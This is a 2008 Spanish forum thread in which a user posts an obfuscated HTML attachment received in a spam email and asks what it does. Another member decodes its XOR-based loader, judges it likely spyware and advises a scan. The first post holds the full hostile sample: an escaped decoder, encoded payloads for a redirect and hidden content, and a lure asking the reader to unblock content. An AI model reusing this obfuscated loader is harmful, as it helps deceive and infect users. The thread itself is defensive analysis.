Foros del Web » Programando para Internet » Javascript »

Qué hace este código que me llegó?

Estas en el tema de Qué hace este código que me llegó? en el foro de Javascript en Foros del Web. Hola a todos! Disculpen que les moleste. Ocurre que me llegó esto adjunto en un e-mail como detalle de un ofrecimiento. Sin pensar, llegué y ...
  #1 (permalink)  
Antiguo 27/05/2008, 12:55
 
Fecha de Ingreso: agosto-2007
Ubicación: Osorno, Chile
Mensajes: 40
Antigüedad: 16 años, 8 meses
Puntos: 0
Pregunta Qué hace este código que me llegó?

Hola a todos!
Disculpen que les moleste.
Ocurre que me llegó esto adjunto en un e-mail como detalle de un ofrecimiento.
Sin pensar, llegué y le acepté abrir, pero llegó a un error.
Y eso me dejó con la gran desconfianza: ¿Qué hace este código?
Podría alguien por favor descifrarlo? (yo aún no comienzo a estudiar Javascript)
Este es el código:
<!--hppage status="protected"-->
<html><!--HEAD--><SCRIPT LANGUAGE="JavaScript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20% 4C%41%4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72 %69%70%74%22%3E%3C%21%2D%2D%0D%0A%68%70%5F%6F%6B%3 D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E%20%68%70% 5F%64%30%31%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B %29%72%65%74%75%72%6E%3B%76%61%72%20%6F%3D%22%22%2 C%61%72%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6F% 73%3D%22%22%2C%69%63%3D%30%3B%66%6F%72%28%69%3D%30 %3B%69%3C%73%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7 B%63%3D%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69% 29%3B%69%66%28%63%3C%31%32%38%29%63%3D%63%5E%32%3B %6F%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%6 8%61%72%43%6F%64%65%28%63%29%3B%69%66%28%6F%73%2E% 6C%65%6E%67%74%68%3E%38%30%29%7B%61%72%5B%69%63%2B %2B%5D%3D%6F%73%3B%6F%73%3D%22%22%7D%7D%6F%3D%61%7 2%2E%6A%6F%69%6E%28%22%22%29%2B%6F%73%3B%64%6F%63% 75%6D%65%6E%74%2E%77%72%69%74%65%28%6F%29%7D%2F%2F %2D%2D%3E%3C%2F%53%43%52%49%50%54%3E"));//--></SCRIPT><SCRIPT LANGUAGE="JavaScript"><!--
hp_d01(unescape(">#//JGCF//%3C>OGVC%22JVVR/GSWKT? Pgdpgqj %22amlvglv?%22 29WPN?jvvr8--oeqv{ng,czqrcag,amo-0-c- %3C>#//-JGCF//%3C"));//--></SCRIPT><!--/HEAD--><!--BODY--><NOSCRIPT>To view FULL DETAILS please click on Information Bar and Allow Blocked Content in your browser. Thank you</NOSCRIPT><SCRIPT LANGUAGE="JavaScript"><!--
hp_d01(unescape(">QAPKRV%22NCLEWCEG? HctcQapkrv %3C>#//kd*lctkecvmp,wqgpCeglv,klfgzMd*%25Egaim%25+#?/3$$lctkecvmp,wqgpCeglv,klfgzMd*%25IJVON%25+??/3+yfmawoglv,upkvg*%25>fkt%22qv{ng? rmqkvkml8c`qmnwvg9ngdv8/3222rz9vmr8/3222rz %3C>koe%22qpa? a8-jr]lwnn,ekd %22ukfvj? 2 %22jgkejv? 2 %3C>-fkt%3C%25+%7F--//%3C>-QAPKRV%3C"));//--></SCRIPT><SCRIPT LANGUAGE="JavaScript"><!--
hp_d01(unescape(">#//@MF[//%3C>#//-@MF[//%3C"));//--></SCRIPT><!--/BODY--></html>

Gracias
  #2 (permalink)  
Antiguo 27/05/2008, 13:19
 
Fecha de Ingreso: marzo-2008
Mensajes: 306
Antigüedad: 16 años, 1 mes
Puntos: 6
Respuesta: Qué hace este código que me llegó?

Va a ser complicado que alguien le dedique mucho tiempo a este asunto.
Puedes utilizar la siguiente utilidad para ver el código que esta "escapado":
http://www.web-code.org/coding-tools...rter-tool.html

Yo te he convertido la primera parte:
Código:
unescape("%3C%53%43%52%49%50%54%20%4C%41%4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E%20%68%70%5F%64%30%31%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B%29%72%65%74%75%72%6E%3B%76%61%72%20%6F%3D%22%22%2C%61%72%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6F%73%3D%22%22%2C%69%63%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%63%3D%63%5E%32%3B%6F%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%6F%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%61%72%5B%69%63%2B%2B%5D%3D%6F%73%3B%6F%73%3D%22%22%7D%7D%6F%3D%61%72%2E%6A%6F%69%6E%28%22%22%29%2B%6F%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%6F%29%7D%2F%2F%2D%2D%3E%3C%2F%53%43%52%49%50%54%3E"
Que en formato claro es:

Código:
<SCRIPT LANGUAGE="JavaScript"><!--
hp_ok=true;function hp_d01(s)
{if(!hp_ok)return;var o="",ar=new Array(),os="",ic=0;for(i=0;i<s.length;i++){c=s.charCodeAt(i);
if(c<128)c=c^2;os+=String.fromCharCode(c);if(os.length>80){ar[ic++]=os;os=""}}o=ar.join("")+os;document.write(o)}
//--></SCRIPT>
__________________
Pop & Rock Bands
Pop Music Stars
  #3 (permalink)  
Antiguo 27/05/2008, 13:30
 
Fecha de Ingreso: agosto-2007
Ubicación: Osorno, Chile
Mensajes: 40
Antigüedad: 16 años, 8 meses
Puntos: 0
Respuesta: Qué hace este código que me llegó?

Gracias, 00Siete
Agradezco tu tiempo y dedicación.
Me puedes dar una opinión por tu conocimiento y experiencia: ¿te parece que este sea un código malicioso o mal intencionado que esté circulando en la red?
El email en que lo recibí publicita algo de Feed Blaster, una forma de poner avisos para ser vistos por millones de personas.
Y como ese tema me interesa, por eso lo abrí, pero ahora quedé asustado.
Gracias de antemando por tu opinión.
  #4 (permalink)  
Antiguo 27/05/2008, 14:21
 
Fecha de Ingreso: marzo-2008
Mensajes: 306
Antigüedad: 16 años, 1 mes
Puntos: 6
Respuesta: Qué hace este código que me llegó?

No lo sé seguro, pero por los esfuerzos que han dedicado a ocultar lo que realiza el script, y el mensaje del tag <noscript>: "view FULL DETAILS please click on Information Bar and Allow Blocked Content in your browser. Thank you", mi intuición me dice que es un código que intenta instalar un Spyware.
Si lo has llegado a ejecutar, te recomiendo que le pases un anti-spyware o anti-virus a tu PC lo antes posible y mientras no estés seguro de que no está infectado yo no utilizaría información sensible en el PC (claves de bancos, de tarjetas de crédito, y similares).
__________________
Pop & Rock Bands
Pop Music Stars
  #5 (permalink)  
Antiguo 27/05/2008, 15:01
 
Fecha de Ingreso: agosto-2007
Ubicación: Osorno, Chile
Mensajes: 40
Antigüedad: 16 años, 8 meses
Puntos: 0
Respuesta: Qué hace este código que me llegó?

Muchas gracias, 00siete
Algo así imaginaba que podría ser, por el hecho de que cuando le di abrir me se demoró unos segundos sin mostrar ninguna página y luego mostró un error del IExplorer.
Te quedo muy agradecido.
Un abrazo.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 09:43.